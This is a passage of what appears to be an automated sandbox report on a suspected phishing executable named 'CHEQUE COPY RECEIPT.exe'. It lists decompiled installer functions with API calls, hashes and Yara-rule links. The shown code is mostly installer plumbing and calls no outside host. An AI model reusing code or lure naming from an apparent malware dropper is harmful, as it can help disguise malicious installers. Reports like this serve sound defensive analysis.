						if(_t31 != 0xffffffff) {
							if(_t31 > 0) {
								E73CA12D1(_t31 - 1, _t44);
								goto L26;
							}
						} else {
							E73CA1266(_t44);
							L26:
						}
					}
					_v88 = _v88 - 1;
					_t48 = _t48 - 0x20;
				} while (_v88 >= 0);
				return GlobalFree(_t44);
			}

0x73ca24e4
0x73ca24e6
0x73ca24f0
0x73ca24f6
0x73ca2500
0x73ca2504
0x73ca2509
0x73ca2509
0x73ca2511
0x73ca2518
0x73ca251e
0x00000000
0x73ca2525
0x00000000
0x00000000
0x73ca252c
0x73ca2530
0x73ca2533
0x73ca2537
0x73ca253e
0x73ca2542
0x73ca2548
0x73ca254a
0x73ca254c
0x73ca254c
0x73ca2553
0x00000000
0x00000000
0x73ca255c
0x00000000
0x00000000
0x73ca256c
0x00000000
0x00000000
0x73ca2598
0x73ca25a0
0x73ca25aa
0x73ca25ac
0x73ca25b1
0x00000000
0x00000000
0x73ca2574
0x73ca2578
0x73ca257a
0x73ca257b
0x73ca257d
0x73ca258d
0x73ca2594
0x00000000
0x00000000
0x73ca25b7
0x73ca25b9
0x73ca25bf
0x73ca25c5
0x73ca25c5
0x00000000
0x00000000
0x73ca251e
0x73ca25c8
0x73ca25c8
0x73ca25cd
0x73ca25de
0x73ca25de
0x73ca25e4
0x73ca25e9
0x73ca25ee
0x73ca25fa
0x73ca25ff
0x00000000
0x73ca2604
0x73ca25f0
0x73ca25f1
0x73ca2605
0x73ca2605
0x73ca25ee
0x73ca2606
0x73ca260a
0x73ca260d
0x73ca2625

APIs

Part of subcall function 73CA1215: GlobalAlloc.KERNEL32(00000040,73CA1233,?,73CA12CF,-73CA404B,73CA11AB,-000000A0), ref: 73CA121D

GlobalFree.KERNEL32 ref: 73CA25DE
GlobalFree.KERNEL32 ref: 73CA2618

Strings

{<u@u<u, xrefs: 73CA257D

Memory Dump Source

Source File: 00000000.00000002.241965832.0000000073CA1000.00000020.00020000.sdmp, Offset: 73CA0000, based on PE: true

Associated: 00000000.00000002.241959915.0000000073CA0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.241972886.0000000073CA3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.241983655.0000000073CA5000.00000002.00020000.sdmp Download File

Similarity

API ID: Global$Free$Alloc
String ID: {<u@u<u
API String ID: 1780285237-2852364109
Opcode ID: 37c8caa45306edd175d8384fc0a9d67028a2f2d5d4e6640221620682e7f2faa4
Instruction ID: fe92bb586b8e9afbb5afae07ed1b5443a18ee012877f29ab81399441cd4b8107
Opcode Fuzzy Hash: 37c8caa45306edd175d8384fc0a9d67028a2f2d5d4e6640221620682e7f2faa4
Instruction Fuzzy Hash: 7641F672508256EFD306EF59CC94E2AB7BAFB85300B15452DF546EB240DB31ED04EB61

Uniqueness

Uniqueness Score: -1.00%

Function 00406528, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406528(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E00405C52(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E00405C10("*?|<>/\":", _t5))) == 0) {
							E00405DA1(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}

0x0040652a
0x00406532
0x00406546
0x00406546
0x0040654c
0x00406559
0x00406559
0x0040655a
0x0040655c
0x00406560
0x00406562
0x0040656b
0x0040656d
0x00406587
0x0040658f
0x0040658f
0x00406594
0x00406596
0x00406598
0x0040659c
0x0040659d
0x004065a0
0x004065a8
0x004065aa
0x004065ae
0x00000000
0x00000000
0x004065b4
0x004065b9
0x00000000
0x00000000
0x00000000
0x004065b9
0x004065be

APIs

CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe" ,7519FA90,C:\Users\user\AppData\Local\Temp\,00000000,00403461,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 00406580
CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 0040658D
CharNextA.USER32(?,"C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe" ,7519FA90,C:\Users\user\AppData\Local\Temp\,00000000,00403461,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 00406592
CharPrevA.USER32(?,?,7519FA90,C:\Users\user\AppData\Local\Temp\,00000000,00403461,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 004065A2

Strings

*?|<>/":, xrefs: 00406570
"C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe" , xrefs: 00406564
C:\Users\user\AppData\Local\Temp\, xrefs: 00406529

Memory Dump Source

Source File: 00000000.00000002.240587109.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.240583232.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240593870.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240597305.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240605351.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240610935.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240616562.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240619861.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-1109028441
Opcode ID: 6624216dd93989c3e415f19addad0263e6dff954d131d517deda7fd7c47402c7
Instruction ID: 84dc9c54e44743018b56ada6ed00289937fbd1a3950c851798eb23a5f2cb525a
Opcode Fuzzy Hash: 6624216dd93989c3e415f19addad0263e6dff954d131d517deda7fd7c47402c7
Instruction Fuzzy Hash: CA1108514047A13AFB3216286C45B777F894F97754F1904BFE8C6722C6C67C5CA2827D

Uniqueness

Uniqueness Score: -1.00%

Function 00404338, Relevance: 12.1, APIs: 8, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404338(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t39;
				long _t41;
				void* _t44;
				signed char _t50;
				long* _t54;

				if(_a4 + 0xfffffecd > 5) {
					L18:
					return 0;
				}
				_t54 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
					goto L18;
				} else {
					_t50 = _t54[5];
					if((_t50 & 0xffffffe0) != 0) {
						goto L18;
					}
					_t39 =  *_t54;
					if((_t50 & 0x00000002) != 0) {
						_t39 = GetSysColor(_t39);
					}
					if((_t54[5] & 0x00000001) != 0) {
						SetTextColor(_a8, _t39);
					}
					SetBkMode(_a8, _t54[4]);
					_t41 = _t54[1];
					_v16.lbColor = _t41;
					if((_t54[5] & 0x00000008) != 0) {
						_t41 = GetSysColor(_t41);
						_v16.lbColor = _t41;
					}
					if((_t54[5] & 0x00000004) != 0) {
						SetBkColor(_a8, _t41);
					}
					if((_t54[5] & 0x00000010) != 0) {
						_v16.lbStyle = _t54[2];
						_t44 = _t54[3];
						if(_t44 != 0) {
							DeleteObject(_t44);
						}
						_t54[3] = CreateBrushIndirect( &_v16);
					}
					return _t54[3];
				}
			}

0x0040434a
0x00404400
0x00000000
0x00404400
0x0040435b
0x0040435f
0x00000000
0x00404379
0x00404379
0x00404382
0x00000000
0x00000000
0x00404384
0x00404390
0x00404393
0x00404393
0x00404399
0x0040439f
0x0040439f
0x004043ab
0x004043b1
0x004043b8
0x004043bb
0x004043be
0x004043c0
0x004043c0
0x004043c8
0x004043ce
0x004043ce
0x004043d8
0x004043dd
0x004043e0
0x004043e5
0x004043e8
0x004043e8
0x004043f8
0x004043f8
0x00000000
0x004043fb

APIs

GetWindowLongA.USER32 ref: 00404355
GetSysColor.USER32(00000000), ref: 00404393
SetTextColor.GDI32(?,00000000), ref: 0040439F
SetBkMode.GDI32(?,?), ref: 004043AB
GetSysColor.USER32(?), ref: 004043BE
SetBkColor.GDI32(?,?), ref: 004043CE
DeleteObject.GDI32(?), ref: 004043E8
CreateBrushIndirect.GDI32(?), ref: 004043F2

Memory Dump Source

Source File: 00000000.00000002.240587109.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.240583232.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240593870.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240597305.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240605351.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240610935.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240616562.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240619861.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
Instruction ID: 4e7267cb447ae131ba3d4846a02e3cb7cb8ad683d93e4e28d2f19cfe4ef5bf63
Opcode Fuzzy Hash: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
Instruction Fuzzy Hash: A02174B15007049FCB319F78ED48B5BBBF8AF41714B04892EED96A26E1D738E914CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00405374, Relevance: 10.6, APIs: 7, Instructions: 73
stringwindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405374(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x42ec24; // 0x0
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x42f514;
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E004062E0(0, _t39, 0x42a098, 0x42a098, _a4);
					}
					_t26 = lstrlenA(0x42a098);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x42ec08, 0x42a098);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x42a098;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x42a098)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x42a098, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

0x0040537a
0x00405386
0x00405389
0x0040538f
0x0040539b
0x0040539e
0x004053a1
0x004053a7
0x004053a7
0x004053ad
0x004053b5
0x004053b8
0x004053d5
0x004053d9
0x004053e2
0x004053e2
0x004053ec
0x004053f5
0x00405401
0x00405408
0x0040540c
0x0040540f
0x00405422
0x00405430
0x00405430
0x00405434
0x00405436
0x00405439
0x00000000
0x00405439
0x004053ba
0x004053c2
0x004053ca
0x004053d0
0x00000000
0x004053d0
0x004053ca
0x004053b8
0x00405443

APIs

lstrlenA.KERNEL32(0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000,?), ref: 004053AD
lstrlenA.KERNEL32(00402EC9,0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000), ref: 004053BD
lstrcatA.KERNEL32(0042A098,00402EC9,00402EC9,0042A098,00000000,00000000,00000000), ref: 004053D0
SetWindowTextA.USER32(0042A098,0042A098), ref: 004053E2
SendMessageA.USER32 ref: 00405408
SendMessageA.USER32 ref: 00405422
SendMessageA.USER32 ref: 00405430

Memory Dump Source

Source File: 00000000.00000002.240587109.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.240583232.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240593870.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240597305.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240605351.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240610935.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240616562.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240619861.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID:
API String ID: 2531174081-0
Opcode ID: 78efb24cfc6d426cc3f30feafde338b5d49fd2ff0c030ae89829439aee15dea2
Instruction ID: d7eb592bfa4ea3045ae5f44a809824ecf19421b2f71a9c0c58d32ef0e79f5504
Opcode Fuzzy Hash: 78efb24cfc6d426cc3f30feafde338b5d49fd2ff0c030ae89829439aee15dea2
Instruction Fuzzy Hash: 0421AC71D00118BFCB11AFA5DD80ADEBFA9EF05354F50807AF904B22A0C7788E958B68

Uniqueness

Uniqueness Score: -1.00%

Function 00402E52, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402E52(intOrPtr _a4) {
				char _v68;
				long _t6;
				struct HWND__* _t7;
				struct HWND__* _t15;

				if(_a4 != 0) {
					_t15 =  *0x42946c;
					if(_t15 != 0) {
						_t15 = DestroyWindow(_t15);
					}
					 *0x42946c = 0;
					return _t15;
				}
				if( *0x42946c != 0) {
					return E00406692(0);
				}
				_t6 = GetTickCount();
				if(_t6 >  *0x42f450) {
					if( *0x42f448 == 0) {
						_t7 = CreateDialogParamA( *0x42f440, 0x6f, 0, E00402DBA, 0);
						 *0x42946c = _t7;
						return ShowWindow(_t7, 5);
					}
					if(( *0x42f514 & 0x00000001) != 0) {
						wsprintfA( &_v68, "... %d%%", E00402E36());
						return E00405374(0,  &_v68);
					}
				}
				return _t6;
			}

0x00402e5e
0x00402e60
0x00402e67
0x00402e6a
0x00402e6a
0x00402e70
0x00000000
0x00402e70
0x00402e7e
0x00000000
0x00402e81
0x00402e88
0x00402e94
0x00402e9c
0x00402eda
0x00402ee3
0x00000000
0x00402ee8
0x00402ea5
0x00402eb6
0x00000000
0x00402ec4
0x00402ea5
0x00402ef0

APIs

DestroyWindow.USER32(?,00000000), ref: 00402E6A
GetTickCount.KERNEL32 ref: 00402E88
wsprintfA.USER32 ref: 00402EB6

Part of subcall function 00405374: lstrlenA.KERNEL32(0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000,?), ref: 004053AD
Part of subcall function 00405374: lstrlenA.KERNEL32(00402EC9,0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000), ref: 004053BD
Part of subcall function 00405374: lstrcatA.KERNEL32(0042A098,00402EC9,00402EC9,0042A098,00000000,00000000,00000000), ref: 004053D0
Part of subcall function 00405374: SetWindowTextA.USER32(0042A098,0042A098), ref: 004053E2
Part of subcall function 00405374: SendMessageA.USER32 ref: 00405408
Part of subcall function 00405374: SendMessageA.USER32 ref: 00405422
Part of subcall function 00405374: SendMessageA.USER32 ref: 00405430

CreateDialogParamA.USER32(0000006F,00000000,00402DBA,00000000), ref: 00402EDA
ShowWindow.USER32(00000000,00000005), ref: 00402EE8

Part of subcall function 00402E36: MulDiv.KERNEL32(?,00000064,?), ref: 00402E4B

Strings

... %d%%, xrefs: 00402EB0

Memory Dump Source

Source File: 00000000.00000002.240587109.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.240583232.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240593870.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240597305.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240605351.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240610935.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240616562.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240619861.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
String ID: ... %d%%
API String ID: 722711167-2449383134
Opcode ID: af689138a4f0791e1d33c6a99b0ca250243e8de88bd1a5e7849c729b12dc1877
Instruction ID: 353ceaab55596b447025a7e101de02e0418331127a37b2bc27e5d18c7d4c6952
Opcode Fuzzy Hash: af689138a4f0791e1d33c6a99b0ca250243e8de88bd1a5e7849c729b12dc1877
Instruction Fuzzy Hash: DA015E70581214ABCB61AB61EF0DA5B766CAB10745B94403BF901F11E0C7B9594ACBEE

Uniqueness

Uniqueness Score: -1.00%

Function 00404C24, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404C24(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}

0x00404c32
0x00404c3f
0x00404c45
0x00404c83
0x00404c83
0x00404c92
0x00404c99
0x00000000
0x00404c9b
0x00404c47
0x00404c56
0x00404c5e
0x00404c61
0x00404c73
0x00404c79
0x00404c80
0x00000000
0x00404c80
0x00000000

APIs

SendMessageA.USER32 ref: 00404C3F
GetMessagePos.USER32 ref: 00404C47
ScreenToClient.USER32 ref: 00404C61
SendMessageA.USER32 ref: 00404C73
SendMessageA.USER32 ref: 00404C99

Strings

f, xrefs: 00404C75

Memory Dump Source

Source File: 00000000.00000002.240587109.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.240583232.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240593870.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240597305.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240605351.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240610935.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240616562.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240619861.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
Instruction ID: c5e601a7729174d758105895f59292295b70f69fbdb61488410ae18d48939760
Opcode Fuzzy Hash: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
Instruction Fuzzy Hash: C8015A71900219BAEB10DBA4DD85BFFBBBCAF55B21F10012BBA40B61D0C7B499058BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00402DBA, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402DBA(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				void* _t11;
				CHAR* _t19;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t11 = E00402E36();
					_t19 = "unpacking data: %d%%";
					if( *0x42f454 == 0) {
						_t19 = "verifying installer: %d%%";
					}
					wsprintfA( &_v68, _t19, _t11);
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}

0x00402dc7
0x00402dd5
0x00402ddb
0x00402ddb
0x00402de9
0x00402deb
0x00402df7
0x00402dfc
0x00402dfe
0x00402dfe
0x00402e09
0x00402e19
0x00402e2b
0x00402e2b
0x00402e33

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DD5
wsprintfA.USER32 ref: 00402E09
SetWindowTextA.USER32(?,?), ref: 00402E19
SetDlgItemTextA.USER32 ref: 00402E2B

Strings

verifying installer: %d%%, xrefs: 00402DFE, 00402E07
unpacking data: %d%%, xrefs: 00402DF7

Memory Dump Source

Source File: 00000000.00000002.240587109.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.240583232.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240593870.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240597305.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240605351.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240610935.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240616562.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240619861.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: unpacking data: %d%%$verifying installer: %d%%
API String ID: 1451636040-1158693248
Opcode ID: e89816a8dfaa52ff9135695e85eb4a48f8702048c86a46640504a18df176bae7
Instruction ID: aa0a6e9b687c9e0f5cd6186ccbd59e0a61a019e4c0b35091a05eaf10890a9e1d
Opcode Fuzzy Hash: e89816a8dfaa52ff9135695e85eb4a48f8702048c86a46640504a18df176bae7
Instruction Fuzzy Hash: A5F06D7054020CFBEF206F60CE0ABAE3769EB10345F00803AFA06B51D0CBB899558F9A

Uniqueness

Uniqueness Score: -1.00%

Function 004027DF, Relevance: 9.1, APIs: 6, Instructions: 86
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E004027DF(void* __ebx, void* __eflags) {
				void* _t26;
				long _t31;
				void* _t45;
				void* _t49;
				void* _t51;
				void* _t54;
				void* _t55;
				void* _t56;

				_t45 = __ebx;
				 *((intOrPtr*)(_t56 - 0xc)) = 0xfffffd66;
				_t50 = E00402BCE(0xfffffff0);
				 *(_t56 - 0x78) = _t23;
				if(E00405C52(_t50) == 0) {
					E00402BCE(0xffffffed);
				}
				E00405DC1(_t50);
				_t26 = E00405DE6(_t50, 0x40000000, 2);
				 *(_t56 + 8) = _t26;
				if(_t26 != 0xffffffff) {
					_t31 =  *0x42f458;
					 *(_t56 - 0x30) = _t31;
					_t49 = GlobalAlloc(0x40, _t31);
					if(_t49 != _t45) {
						E0040343E(_t45);
						E00403428(_t49,  *(_t56 - 0x30));
						_t54 = GlobalAlloc(0x40,  *(_t56 - 0x20));
						 *(_t56 - 0x38) = _t54;
						if(_t54 != _t45) {
							E004031B7(_t47,  *((intOrPtr*)(_t56 - 0x24)), _t45, _t54,  *(_t56 - 0x20));
							while( *_t54 != _t45) {
								_t47 =  *_t54;
								_t55 = _t54 + 8;
								 *(_t56 - 0x8c) =  *_t54;
								E00405DA1( *((intOrPtr*)(_t54 + 4)) + _t49, _t55, _t47);
								_t54 = _t55 +  *(_t56 - 0x8c);
							}
							GlobalFree( *(_t56 - 0x38));
						}
						E00405E8D( *(_t56 + 8), _t49,  *(_t56 - 0x30));
						GlobalFree(_t49);
						 *((intOrPtr*)(_t56 - 0xc)) = E004031B7(_t47, 0xffffffff,  *(_t56 + 8), _t45, _t45);
					}
					CloseHandle( *(_t56 + 8));
				}
				_t51 = 0xfffffff3;
				if( *((intOrPtr*)(_t56 - 0xc)) < _t45) {
					_t51 = 0xffffffef;
					DeleteFileA( *(_t56 - 0x78));
					 *((intOrPtr*)(_t56 - 4)) = 1;
				}
				_push(_t51);
				E00401423();
				 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t56 - 4));
				return 0;
			}

0x004027df
0x004027e1
0x004027ed
0x004027f0
0x004027fa
0x004027fe
0x004027fe
0x00402804
0x00402811
0x00402819
0x0040281c
0x00402822
0x00402830
0x00402835
0x00402839
0x0040283c
0x00402845
0x00402851
0x00402855
0x00402858
0x00402862
0x00402887
0x00402869
0x0040286e
0x00402876
0x0040287c
0x00402881
0x00402881
0x0040288e
0x0040288e
0x0040289b
0x004028a1
0x004028b3
0x004028b3
0x004028b9
0x004028b9
0x004028c4
0x004028c5
0x004028c9
0x004028cd
0x004028d3
0x004028d3
0x004028da
0x004022dd
0x00402a5d
0x00402a69

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402833
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 0040284F
GlobalFree.KERNEL32 ref: 0040288E
GlobalFree.KERNEL32 ref: 004028A1
CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 004028B9
DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004028CD

Memory Dump Source

Source File: 00000000.00000002.240587109.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.240583232.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240593870.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240597305.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240605351.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240610935.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240616562.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240619861.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: 10aa94e9192e65a0b09259698f99f40e5440345eda598c6609a5c103b0ccd052
Instruction ID: 6e19ad8f311a8fe4d121ff6d49c8506e1ed5368105aa9b5939d25a16afe37da6
Opcode Fuzzy Hash: 10aa94e9192e65a0b09259698f99f40e5440345eda598c6609a5c103b0ccd052
Instruction Fuzzy Hash: C0219F72800124BBDF217FA5CE48D9E7E79EF09324F14823EF450762D1CA7949418FA8

Uniqueness

Uniqueness Score: -1.00%

Function 73CA1837, Relevance: 7.7, APIs: 5, Instructions: 194
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E73CA1837(signed int __edx, void* __eflags, void* _a8, void* _a16) {
				void* _v8;
				signed int _v12;
				signed int _v20;
				signed int _v24;
				char _v52;
				void _t45;
				void _t46;
				signed int _t47;
				signed int _t48;
				signed int _t57;
				signed int _t58;
				signed int _t59;
				signed int _t60;
				signed int _t61;
				void* _t67;
				void* _t68;
				void* _t69;
				void* _t70;
				void* _t71;
				signed int _t77;
				void* _t81;
				signed int _t83;
				signed int _t85;
				signed int _t87;
				signed int _t90;
				void* _t101;

				_t85 = __edx;
				 *0x73ca405c = _a8;
				_t77 = 0;
				 *0x73ca4060 = _a16;
				_v12 = 0;
				_v8 = E73CA123B();
				_t90 = E73CA12FE(_t42);
				_t87 = _t85;
				_t81 = E73CA123B();
				_a8 = _t81;
				_t45 =  *_t81;
				if(_t45 != 0x7e && _t45 != 0x21) {
					_a16 = E73CA123B();
					_t77 = E73CA12FE(_t74);
					_v12 = _t85;
					GlobalFree(_a16);
					_t81 = _a8;
				}
				_t46 =  *_t81;
				_t101 = _t46 - 0x2f;
				if(_t101 > 0) {
					_t47 = _t46 - 0x3c;
					__eflags = _t47;
					if(_t47 == 0) {
						__eflags =  *((char*)(_t81 + 1)) - 0x3c;
						if( *((char*)(_t81 + 1)) != 0x3c) {
							__eflags = _t87 - _v12;
							if(__eflags > 0) {
								L56:
								_t48 = 0;
								__eflags = 0;
								L57:
								asm("cdq");
								L58:
								_t90 = _t48;
								_t87 = _t85;
								L59:
								E73CA1429(_t85, _t90, _t87,  &_v52);
								E73CA1266( &_v52);
								GlobalFree(_v8);
								return GlobalFree(_a8);
							}
							if(__eflags < 0) {
								L49:
								__eflags = 0;
								L50:
								_t48 = 1;
								goto L57;
							}
